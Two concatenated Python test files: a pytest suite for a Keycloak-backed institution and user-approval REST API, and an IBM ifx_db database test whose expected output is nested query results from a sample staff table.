# tests/user_mgmt/test_api_insts.py (WIPACrepo/keycloak-rest-services, MIT license)
import asyncio
import pytest
from rest_tools.client import AsyncSession
import krs.users
import krs.groups
import krs.email
from ..util import keycloak_bootstrap
from .util import port, server, mongo_client, email_patch

@pytest.mark.asyncio
async def test_experiments_empty(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    ret = await client.request('GET', '/api/experiments')
    assert ret == []

@pytest.mark.asyncio
async def test_experiments(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    ret = await client.request('GET', '/api/experiments')
    assert ret == ['IceCube']

@pytest.mark.asyncio
async def test_institutions_empty(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    ret = await client.request('GET', '/api/experiments/IceCube/institutions')
    assert ret == []

@pytest.mark.asyncio
async def test_institutions(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    ret = await client.request('GET', '/api/experiments/IceCube/institutions')
    assert ret == ['UW-Madison']

@pytest.mark.asyncio
async def test_institution_subgroups_empty(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    ret = await client.request('GET', '/api/experiments/IceCube/institutions/UW-Madison')
    assert ret == {'subgroups': []}

@pytest.mark.asyncio
async def test_institution_subgroups(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
    ret = await client.request('GET', '/api/experiments/IceCube/institutions/UW-Madison')
    assert ret == {'subgroups': ['authorlist']}

@pytest.mark.asyncio
async def test_all_experiments(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-RF', rest_client=krs_client)
    await krs.groups.create_group('/institutions/Gen2', rest_client=krs_client)
    await krs.groups.create_group('/institutions/Gen2/UW-RF', rest_client=krs_client)
    await krs.groups.create_group('/institutions/Gen2/UW-RF/authorlist', rest_client=krs_client)
    ret = await client.request('GET', '/api/all-experiments')
    expected = {
        'IceCube': {
            'UW-Madison': {'subgroups': ['authorlist']},
            'UW-RF': {'subgroups': []},
        },
        'Gen2': {
            'UW-RF': {'subgroups': ['authorlist']},
        },
    }
    assert ret == expected

@pytest.mark.asyncio
async def test_institution_users(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
    with pytest.raises(Exception):
        await client.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    assert ret == {'users': [], 'authorlist': []}

@pytest.mark.asyncio
async def test_institution_users_superadmin(server):
    rest, krs_client, *_ = server
    client = await rest('test', groups=['/admin'])
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-RiverFalls', rest_client=krs_client)
    ret = await client.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    assert ret == {'users': [], 'authorlist': []}

@pytest.mark.asyncio
async def test_institution_adduser(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    assert ret == {'users': [], 'authorlist': []}
    await client2.request('PUT', '/api/experiments/IceCube/institutions/UW-Madison/users/test')
    ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    assert ret == {'users': ['test'], 'authorlist': []}
    await client2.request('PUT', '/api/experiments/IceCube/institutions/UW-Madison/users/test', {'authorlist': True})
    ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    assert ret == {'users': ['test'], 'authorlist': ['test']}

@pytest.mark.asyncio
async def test_institution_removeuser(server):
    rest, krs_client, *_ = server
    client = await rest('test')
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
    await krs.groups.add_user_group('/institutions/IceCube/UW-Madison', 'test', rest_client=krs_client)
    await krs.groups.add_user_group('/institutions/IceCube/UW-Madison/authorlist', 'test', rest_client=krs_client)
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    assert ret == {'users': ['test'], 'authorlist': ['test']}
    await client2.request('PUT', '/api/experiments/IceCube/institutions/UW-Madison/users/test', {'authorlist': False})
    ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    assert ret == {'users': ['test'], 'authorlist': []}
    await krs.groups.add_user_group('/institutions/IceCube/UW-Madison/authorlist', 'test', rest_client=krs_client)
    await client2.request('DELETE', '/api/experiments/IceCube/institutions/UW-Madison/users/test')
    ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
    assert ret == {'users': [], 'authorlist': []}

@pytest.mark.asyncio
async def test_inst_approvals_register(server, mongo_client, email_patch):
    _, krs_client, address, *_ = server
    session = AsyncSession(retries=0)
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    with pytest.raises(Exception):
        r = await asyncio.wrap_future(session.post(address+'/api/inst_approvals'))
        r.raise_for_status()
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
        'first_name': 'First',
        'last_name': 'Last',
        'email': 'test@test',
    }
    r = await asyncio.wrap_future(session.post(address+'/api/inst_approvals', json=data))
    r.raise_for_status()
    ret = r.json()
    approval_id = ret['id']
    email_patch.assert_not_called()
    ret = await mongo_client.user_registrations.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['first_name'] == data['first_name']
    assert ret[0]['username'] == 'flast'
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    assert ret[0]['experiment'] == data['experiment']
    assert ret[0]['institution'] == data['institution']

@pytest.mark.asyncio
async def test_inst_approvals_register_with_admins(server, mongo_client, email_patch):
    rest, krs_client, address, *_ = server
    session = AsyncSession(retries=0)
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
        'first_name': 'First',
        'last_name': 'Last',
        'email': 'test@test',
    }
    r = await asyncio.wrap_future(session.post(address+'/api/inst_approvals', json=data))
    r.raise_for_status()
    ret = r.json()
    approval_id = ret['id']
    email_patch.assert_called()
    ret = await mongo_client.user_registrations.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['first_name'] == data['first_name']
    assert ret[0]['username'] == 'flast'
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    assert ret[0]['experiment'] == data['experiment']
    assert ret[0]['institution'] == data['institution']

@pytest.mark.asyncio
async def test_inst_approvals_second(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    client = await rest('test')
    with pytest.raises(Exception):
        await client.request('POST', '/api/inst_approvals')
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
    }
    ret = await client.request('POST', '/api/inst_approvals', data)
    approval_id = ret['id']
    email_patch.assert_not_called()
    ret = await mongo_client.user_registrations.find().to_list(10)
    assert len(ret) == 0
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    assert ret[0]['experiment'] == data['experiment']
    assert ret[0]['institution'] == data['institution']
    assert ret[0]['username'] == 'test'

@pytest.mark.asyncio
async def test_inst_approvals_second_with_admin(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    client = await rest('test')
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    client3 = await rest('test3', groups=['/institutions/IceCube/UW-Madison/_admin'])
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
    }
    ret = await client.request('POST', '/api/inst_approvals', data)
    approval_id = ret['id']
    # two institution admins exist, so two notification emails are expected
    assert email_patch.call_count == 2
    ret = await mongo_client.user_registrations.find().to_list(10)
    assert len(ret) == 0
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    assert ret[0]['experiment'] == data['experiment']
    assert ret[0]['institution'] == data['institution']
    assert ret[0]['username'] == 'test'

@pytest.mark.asyncio
async def test_inst_approvals_move(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/OldInst', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    client = await rest('test', groups=['/institutions/IceCube/OldInst'])
    with pytest.raises(Exception):
        await client.request('POST', '/api/inst_approvals')
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
        'remove_institution': 'OldInst',
    }
    ret = await client.request('POST', '/api/inst_approvals', data)
    approval_id = ret['id']
    email_patch.assert_not_called()
    ret = await mongo_client.user_registrations.find().to_list(10)
    assert len(ret) == 0
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    assert ret[0]['experiment'] == data['experiment']
    assert ret[0]['institution'] == data['institution']
    assert ret[0]['remove_institution'] == data['remove_institution']
    assert ret[0]['username'] == 'test'

@pytest.mark.asyncio
async def test_inst_approvals_move_with_admin(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/OldInst', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    client = await rest('test', groups=['/institutions/IceCube/OldInst'])
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    with pytest.raises(Exception):
        await client.request('POST', '/api/inst_approvals')
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
        'remove_institution': 'OldInst',
    }
    ret = await client.request('POST', '/api/inst_approvals', data)
    approval_id = ret['id']
    email_patch.assert_called()
    ret = await mongo_client.user_registrations.find().to_list(10)
    assert len(ret) == 0
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    assert ret[0]['experiment'] == data['experiment']
    assert ret[0]['institution'] == data['institution']
    assert ret[0]['remove_institution'] == data['remove_institution']
    assert ret[0]['username'] == 'test'

@pytest.mark.asyncio
async def test_inst_approvals_get(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    client = await rest('test')
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
    }
    ret = await client.request('POST', '/api/inst_approvals', data)
    approval_id = ret['id']
    email_patch.assert_called()
    # no auth
    with pytest.raises(Exception):
        await client.request('GET', '/api/inst_approvals')
    # success
    ret = await client2.request('GET', '/api/inst_approvals')
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    assert ret[0]['experiment'] == data['experiment']
    assert ret[0]['institution'] == data['institution']
    assert ret[0]['username'] == 'test'

@pytest.mark.asyncio
async def test_inst_approvals_actions_approve(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    client = await rest('test')
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
    }
    ret = await client.request('POST', '/api/inst_approvals', data)
    approval_id = ret['id']
    email_patch.assert_called()
    email_patch.reset_mock()
    # no auth
    with pytest.raises(Exception):
        await client.request('POST', f'/api/inst_approvals/{approval_id}/actions/approve')
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    email_patch.assert_not_called()
    ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    assert 'test' not in ret
    # success
    await client2.request('POST', f'/api/inst_approvals/{approval_id}/actions/approve')
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 0
    email_patch.assert_called()
    ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    assert 'test' in ret

@pytest.mark.asyncio
async def test_inst_approvals_actions_approve_gen2(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube-Gen2', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube-Gen2/UW-Madison', rest_client=krs_client)
    client = await rest('test')
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
    }
    ret = await client.request('POST', '/api/inst_approvals', data)
    approval_id = ret['id']
    email_patch.assert_called()
    email_patch.reset_mock()
    await client2.request('POST', f'/api/inst_approvals/{approval_id}/actions/approve')
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 0
    email_patch.assert_called()
    ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    assert 'test' in ret
    ret = await krs.groups.get_group_membership('/institutions/IceCube-Gen2/UW-Madison', rest_client=krs_client)
    assert 'test' in ret

@pytest.mark.asyncio
async def test_inst_approvals_actions_approve_posix(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    await krs.groups.create_group('/posix', rest_client=krs_client)
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
        'first_name': 'first',
        'last_name': 'last',
        'email': 'test@test',
    }
    _, krs_client, address, *_ = server
    session = AsyncSession(retries=0)
    r = await asyncio.wrap_future(session.post(address+'/api/inst_approvals', json=data))
    r.raise_for_status()
    ret = r.json()
    approval_id = ret['id']
    email_patch.assert_called()
    email_patch.reset_mock()
    await client2.request('POST', f'/api/inst_approvals/{approval_id}/actions/approve')
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 0
    email_patch.assert_called()
    ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    assert 'flast' in ret
    ret = await krs.groups.get_group_membership('/posix', rest_client=krs_client)
    assert 'flast' in ret

@pytest.mark.asyncio
async def test_inst_approvals_actions_deny(server, mongo_client, email_patch):
    rest, krs_client, *_ = server
    await krs.groups.create_group('/institutions', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
    await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    client = await rest('test')
    client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
    data = {
        'experiment': 'IceCube',
        'institution': 'UW-Madison',
    }
    ret = await client.request('POST', '/api/inst_approvals', data)
    approval_id = ret['id']
    email_patch.assert_called()
    email_patch.reset_mock()
    # no auth
    with pytest.raises(Exception):
        await client.request('POST', f'/api/inst_approvals/{approval_id}/actions/deny')
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 1
    assert ret[0]['id'] == approval_id
    email_patch.assert_not_called()
    ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    assert 'test' not in ret
    # success
    await client2.request('POST', f'/api/inst_approvals/{approval_id}/actions/deny')
    ret = await mongo_client.inst_approvals.find().to_list(10)
    assert len(ret) == 0
    email_patch.assert_called()
    ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
    assert 'test' not in ret
# ifx_db/tests/test_038_FetchRowIndexPosNested_01.py (ifxdb/PythonIfxDB, Apache-2.0 license)
#
# Licensed Materials - Property of IBM
#
# (c) Copyright IBM Corp. 2007-2008
#
import unittest, sys
import ifx_db
import config
from testfunctions import IfxDbTestFunctions

class IfxDbTestCase(unittest.TestCase):

    def test_038_FetchRowIndexPosNested_01(self):
        obj = IfxDbTestFunctions()
        obj.assert_expect(self.run_test_038)

    def run_test_038(self):
        conn = ifx_db.connect(config.ConnStr, config.user, config.password)
        serverinfo = ifx_db.server_info(conn)
        if (serverinfo.DBMS_NAME[0:3] != 'Inf'):
            result = ifx_db.exec_immediate(conn, "SELECT * FROM staff WHERE id < 101", {ifx_db.SQL_ATTR_CURSOR_TYPE: ifx_db.SQL_CURSOR_KEYSET_DRIVEN})
        else:
            result = ifx_db.exec_immediate(conn, "SELECT * FROM staff WHERE id < 101")
        row = ifx_db.fetch_row(result)
        while (row):
            if (serverinfo.DBMS_NAME[0:3] != 'Inf'):
                result2 = ifx_db.prepare(conn, "SELECT * FROM staff WHERE id < 101", {ifx_db.SQL_ATTR_CURSOR_TYPE: ifx_db.SQL_CURSOR_KEYSET_DRIVEN})
            else:
                result2 = ifx_db.prepare(conn, "SELECT * FROM staff WHERE id < 101")
            ifx_db.execute(result2)
            row2 = ifx_db.fetch_row(result2)
            while (row2):
                # parenthesized print works under both Python 2 and Python 3
                print("%s : %s : %s : %s : %s\n" % (ifx_db.result(result2, 0),
                                                    ifx_db.result(result2, 1),
                                                    ifx_db.result(result2, 2),
                                                    ifx_db.result(result2, 3),
                                                    ifx_db.result(result2, 5)))
                row2 = ifx_db.fetch_row(result2)
            row = ifx_db.fetch_row(result)

#__END__
#__LUW_EXPECTED__
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#__ZOS_EXPECTED__
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
